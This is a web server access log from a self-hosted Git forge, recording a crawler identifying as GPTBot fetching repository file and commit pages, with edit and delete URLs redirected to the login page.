"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11311] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21318] [Gzip 6.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11031] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11105] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11241] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21349] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11282] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10957] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11312] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11037] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:15:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:15:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21348] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 13106] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" -[17/Feb/2026:16:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog?display=rendered" [Client 74.7.227.38] [Length 84665] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:16:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 11022] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:16:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build" [Client 74.7.227.38] [Length 10076] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:16:15:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 12732] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:16:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fgold_price_log.csv" [Client 74.7.227.38] [Length 25190] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:16:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 23783] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:16:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fproxy-host-4_error.log" [Client 74.7.227.38] [Length 25722] [Gzip 5.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2fproxy-host-4_error.log" [Client 74.7.227.38] [Length 29991] [Gzip 8.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:16:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2fproxy-host-2_access.log" [Client 74.7.227.38] [Length 22834] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2fproxy-host-1_error.log" [Client 74.7.227.38] [Length 23911] [Gzip 6.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2fproxy-host-3_error.log" [Client 74.7.227.38] [Length 20312] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2fproxy-host-1_access.log" [Client 74.7.227.38] [Length 48158] [Gzip 17.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:16:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe" -[17/Feb/2026:16:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/chromedriver.exe" -[17/Feb/2026:16:16:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build" -[17/Feb/2026:16:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build" -[17/Feb/2026:16:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec?display=source" [Client 74.7.227.38] [Length 12746] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:16:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:16:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:16:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresMonitor/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build" -[17/Feb/2026:16:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresMonitor/build" -[17/Feb/2026:16:16:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe" -[17/Feb/2026:16:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/chromedriver.exe" -[17/Feb/2026:16:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 9788] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 12007] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:16:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build" -[17/Feb/2026:16:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build" -[17/Feb/2026:16:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build" [Client 74.7.227.38] [Length 10272] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build" -[17/Feb/2026:16:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 9788] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe" -[17/Feb/2026:16:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe" -[17/Feb/2026:16:16:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 905] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:16:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2fproxy-host-2_access.log" [Client 74.7.227.38] [Length 25721] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fproxy-host-2_error.log" [Client 74.7.227.38] [Length 25400] [Gzip 5.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fproxy-host-1_error.log" [Client 74.7.227.38] [Length 26528] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 